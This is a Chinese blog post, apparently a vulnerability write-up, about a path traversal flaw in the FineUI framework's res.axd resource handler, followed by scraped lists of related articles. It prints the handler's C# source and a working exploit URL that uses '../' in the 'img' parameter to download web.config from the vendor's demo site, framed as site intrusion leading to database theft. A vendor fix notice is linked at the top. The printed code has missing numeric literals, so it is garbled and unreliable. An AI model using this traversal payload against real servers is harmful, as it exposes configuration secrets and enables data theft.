注:屏蔽本漏洞的紧急通知:http://fineui.com/bbs/forum.php?mod=viewthread&tid=7863

本人小学文化,文采不好,写的不好请各位多多包含,

    最近笔者喜欢研究一些代码安全方面的问题,前些日子研究了下力软的框架,发现代码安全方面做的还是不足的,今天偶尔的机会接触了下fineui,从最开始的注入开始,都没有什么突破,

最好就想到列别的排序,从列别排序注入,弄了好久,发现一直没注入成功也没有报错,我就很是奇怪,然后看了下fineui的开源版,看了代码,发现原来他是判断的 ,不是拼接的,难怪注入失败,

本来以为没什么办法了,然后查看页面源码,发现一个引用引起了我的注意:

这个地址,于是去看了下他的源码

using System;

using System.Collections.Generic;

using System.Text;

using System.Web;

using System.Reflection;

using System.IO;

using System.Drawing.Imaging;

namespace FineUI

{

    /// <summary>

    /// 资源处理程序

    /// </summary>

    public class ResourceHandler : IHttpHandler

    {

        /// <summary>

        /// 处理资源的请求

        /// </summary>

        /// <param name="context">Http请求上下文</param>

        public void ProcessRequest(HttpContext context)

        {

            string type = String.Empty;

            string typeValue = String.Empty;

            string extjsBasePath = GlobalConfig.GetExtjsBasePath();

            //resName = "FineUI.";

            if (!String.IsNullOrEmpty(typeValue = context.Request.QueryString["icon"]))

            {

                type = "icon";

            }

            //else if (!String.IsNullOrEmpty(typeValue = context.Request.QueryString["js"]))

            //{

            //    type = "js";

            //    //resName += "js." + typeValue;

            //}

            //else if (!String.IsNullOrEmpty(typeValue = context.Request.QueryString["lang"]))

            //{

            //    type = "lang";

            //    //resName += "js.lang." + typeValue;

            //}

            else if (!String.IsNullOrEmpty(typeValue = context.Request.QueryString["theme"]))

            {

                // res.axd?theme=default.grid.refresh.gif

                type = "theme";

                //resName += "res.theme." + typeValue;

            }

            //else if (!String.IsNullOrEmpty(typeValue = context.Request.QueryString["css"]))

            //{

            //    type = "css";

            //    //resName += "res.css." + typeValue;

            //}

            else if (!String.IsNullOrEmpty(typeValue = context.Request.QueryString["img"]))

            {

                type = "img";

                //resName += "res.img." + typeValue;

            }

            else

            {

                context.Response.Write("Not supported!");

                return;

            }

            //byte[] binary;

            switch (type)

            {

                case "icon":

                    if (!typeValue.EndsWith(".png") && !typeValue.EndsWith(".gif"))

                    {

                        typeValue = IconHelper.GetName((Icon)Enum.Parse(typeof(Icon), typeValue));

                    }

                    //resName += "res.icon." + typeValue;

                    string serverPath = String.Format("{0}/{1}", GlobalConfig.GetIconBasePath(), typeValue);

                    context.Response.WriteFile(context.Server.MapPath(serverPath));

                    context.Response.ContentType = "image/" + GetImageFormat(typeValue);

                    break;

                //case "js":

                //    context.Response.Write(ResourceHelper.GetResourceContent(resName));

                //    context.Response.ContentType = "text/javascript";

                //case "lang":

                //    context.Response.Write(ResourceHelper.GetResourceContent(resName));

                //    context.Response.ContentType = "text/javascript";

                //    break;

                //case "css":

                //    context.Response.Write(ResourceHelper.GetResourceContent(resName));

                //    context.Response.ContentType = "text/css";

                //    break;

                case "theme":

                    string themePath = "";

                    string themeImageFormat = "";

                    int lastDotIndex = typeValue.LastIndexOf(".");

                    if (lastDotIndex >= )

                    {

                        themePath = typeValue.Substring(, lastDotIndex).Replace('.', '/');

                        themeImageFormat = typeValue.Substring(lastDotIndex + );

                    }

                    context.Response.WriteFile(context.Server.MapPath(String.Format("{0}/res/images/{1}.{2}", extjsBasePath, themePath, themeImageFormat)));

                    context.Response.ContentType = "image/" + GetImageFormat(typeValue);

                    break;

                case "img":

                    //binary = ResourceHelper.GetResourceContentAsBinary(resName);

                    //context.Response.OutputStream.Write(binary, 0, binary.Length);

                    //context.Response.ContentType = "image/" + GetImageFormat(resName);

                    context.Response.WriteFile(context.Server.MapPath(String.Format("{0}/res/images/{1}", extjsBasePath, typeValue)));

                    context.Response.ContentType = "image/" + GetImageFormat(typeValue);

                    break;

            }

            // 缓存一年,只能通过改变 URL 来强制更新缓存

            context.Response.Cache.SetExpires(DateTime.Now.AddYears());

            context.Response.Cache.SetCacheability(HttpCacheability.Public);

        }

        //private void RenderImage(HttpContext context, string resName)

        //{

        //    Assembly assembly = Assembly.GetExecutingAssembly();

        //    using (Stream stream = assembly.GetManifestResourceStream(resName))

        //    {

        //        using (System.Drawing.Image image = System.Drawing.Image.FromStream(stream))

        //        {

        //            // PNG输出时出现“GDI+ 中发生一般性错误”

        //            using (MemoryStream ms = new MemoryStream())

        //            {

        //                image.Save(ms, image.RawFormat);

        //                ms.WriteTo(context.Response.OutputStream);

        //                context.Response.ContentType = "image/" + GetImageFormat(image.RawFormat);

        //            }

        //        }

        //    }

        //}

        private string GetImageFormat(string imageName)

        {

            int lastDotIndex = imageName.LastIndexOf(".");

            if (lastDotIndex >= )

            {

                return imageName.Substring(lastDotIndex + );

            }

            return "png";

        }

        private string GetImageFormat(ImageFormat format)

        {

            if (format == ImageFormat.Bmp)

            {

                return "bmp";

            }

            else if (format == ImageFormat.Gif)

            {

                return "gif";

            }

            else if (format == ImageFormat.Jpeg)

            {

                return "jpeg";

            }

            else if (format == ImageFormat.Png)

            {

                return "png";

            }

            else if (format == ImageFormat.Tiff)

            {

                return "tiff";

            }

            else if (format == ImageFormat.Icon)

            {

                return "icon";

            }

            return "gif";

        }

        /// <summary>

        /// 只要请求的 URL 相同,则请求可以重用

        /// </summary>

        public bool IsReusable

        {

            get

            {

                return true;

            }

        }

    }

}

看了下,高兴啊。。太好了,不知道你们看出问题来了没有,

问题代码就在

  case "img":

                    //binary = ResourceHelper.GetResourceContentAsBinary(resName);

                    //context.Response.OutputStream.Write(binary, 0, binary.Length);

                    //context.Response.ContentType = "image/" + GetImageFormat(resName);

                    context.Response.WriteFile(context.Server.MapPath(String.Format("{0}/res/images/{1}", extjsBasePath, typeValue)));

                    context.Response.ContentType = "image/" + GetImageFormat(typeValue);

                    break;

大家都应该知道 我们引用js或者css的时候经常会有../ 这样的路径,其实很简单,就是上级目录,

我们就利用这个../  把作者写的/res/images/给去掉  也就是变成路径

/res/images/../../web.config

就这样我们就可以拿到web.config了,然后拼成完整的url:http://fineui.com/demo/res.axd?img=../../../../appboxpro/web.config&t=icon  浏览器输入

ok web.config就这样被拿下来了,,,当然,web.config都拿下了,其它也就都没什么可说的了,

今天就先到这吧。。。还得写文档,明天演示项目,注定又是一个无眠夜。。。

ASP.NET网站入侵第三波(fineui系统漏洞,可导致被拖库)的更多相关文章

  1. ASP.NET网站入侵第二波(LeaRun.信息化快速开发框架 已被笔者拿下)

    笔者小学文化,语言组织能力差,写的不通的地方请大家将就着看,不喜勿喷. 上篇我讲了如何在上传文件中入侵服务器,這次我们稍微多讲一点. 还是先讲下流程: 1.上传代码页面  我上传的是ashx页面. 2 ...

  2. 记一次ASP.NET网站的入侵和如何避免被入侵

    ASP.NET网站入侵第二波(LeaRun.信息化快速开发框架 已被笔者拿下) 详细介绍请看第二波 首先我要申明的是不是什么语言写出来的程序就不安全,而是得看写代码的人如何去写这个程序 前些日子我去客 ...

  3. 图文解说Win7系统机器上发布C#+ASP.NET网站

      1.     概述 在一台干净的Win7机器上发布ASP.NET网站需要准备的有: a)        .NET Framework 环境 b)        数据库 c)        IIS ...

  4. 在Windows系统搭建.NET Core环境并创建运行ASP.NET网站

    微软于6月27日在红帽DevNation峰会上 正式发布了.NET Core 1.0.ASP.NET 1.0和Entity Framework Core 1.0,其将全部支持Windows.OS X和 ...

  5. web安全普及:通俗易懂,如何让网站变得更安全?以实例来讲述网站入侵原理及防护。

    本篇以我自己的网站[http://www.1996v.com]为例来通俗易懂的讲述如何防止网站被入侵,如何让网站更安全. 要想足够安全,首先得知道其中的道理. 本文例子通俗易懂,从"破解网站 ...

  6. ASP.NET 开发必备知识点(1):如何让Asp.net网站运行在自定义的Web服务器上

    一.前言 大家都知道,在之前,我们Asp.net 的网站都只能部署在IIS上,并且IIS也只存在于Windows上,这样Asp.net开发的网站就难以做到跨平台.由于微软的各项技术的开源,所以微软自然 ...

  7. 搭建调用 WebService 的 ASP.NET 网站 (VS2010, C#)

    [系统环境]Windows 7 / 2008r2 [软件环境]Visual Studio 2010 [开发语言]C# [感谢]本文是在 <C#开发和调用Web Service> 一文的基础 ...

  8. 多年前写的一个ASP.NET网站管理系统,到现在有些公司在用

    多年前写的一个ASP.NET网站管理系统,到现在有些公司在用 今早上接到一个电话,自已多年前写的一个ASP.NET网站管理系统,一个公司在用,出了点问题, 第一点是惊奇,5,6年前的东东,手机号码换了 ...

  9. 64位Win7下运行ASP+Access网站的方法

    64位Win7下运行ASP+Access网站的方法 近日系统升级为WIN7 64位之后,突然发现原本运行正常的ASP+ACCESS网站无法正常连接数据库. 网上搜索多次,终于解决了问题,总结了几条经验 ...

随机推荐

  1. js实现页面跳转的几种方式

    第一种:    <script language="javascript" type="text/javascript">           wi ...

  2. HBase应用开发回顾与总结系列之三:RowKey行键生成器工具

      所谓RowKey行键生成器,是指通过软件工具制定行键生成策略,并可将策略信息保存成本地策略文件,待需要时再将本地策略文件序列化成行键生成策略对象,传入数据行信息后可自动生成RowKey行键. 那么 ...

  3. Linux 引导修复

    前些天,我的Ubuntu老提示"Filesystem root"空间不足,于是,我煞笔的用win pe去扩展空间,结果,空间扩展不成,反倒丢失了引导..... 于是就上网查资料,看 ...

  4. css3 border-radius

    前缀对应浏览器 前缀 浏览器 -webkit chrome和safari -moz firefox -ms IE -o opera border-radius: <style type=&quo ...

  5. Spring学习之第一个Spring MVC程序(IDEA开发环境)

    回顾Java平台上Web开发历程来看,从Servlet出现开始,到JSP繁盛一时,然后是Servlet+JSP时代,最后演化为现在Web开发框架盛行的时代.一般接触到一个新的Web框架,都会想问这个框 ...

  6. UVALive 5058 Counting BST --组合数

    题意:排序二叉树按照数插入的顺序不同会出现不同的结构,现在要在1~m选n个数,使按顺序插入形成的结构与给出的结构相同,有多少种选法. 解法:先将给出的结构插入,构造出一棵排序二叉树,再dfs统计,首先 ...

  7. Hibernate批量处理数据、HQL连接查询

    一.批量处理操作 批量处理数据是指在一个事务场景中处理大量数据.在应用程序中难以避免进行批量操作,Hibernate提供了以下方式进行批量处理数据: (1)使用HQL进行批量操作     数据库层面 ...

  8. IT菜鸟的第一天

    小弟愚钝,被别人影响,打算入IT行业试试水的深浅,俗话说技不压身,多会一种就多一条路子,抱着这种求知的心态我就开始的我在汉企的IT生涯! 第一天无非就是简介,对IT行业的介绍,反正听得我挺懵的,不过介 ...

  9. Redis的安装和使用

    Redis 安装redis: 将将要安装redis文件夹放到一个盘中 通过命令行切换到放文件的地方 安装成功后,将文件夹中的扩展放入wamp/php/ext中,然后配置php.ini,重启服务器. 使 ...

  10. AlertDialog禁止返回键

    android 如何让dialog不消失,即使是用户按了返回键dialog也不消失 解决的问题:软件提示升级的dialog时候,用户有可能按了返回键,但是现在的需求是用户只能按"确定升级&q ...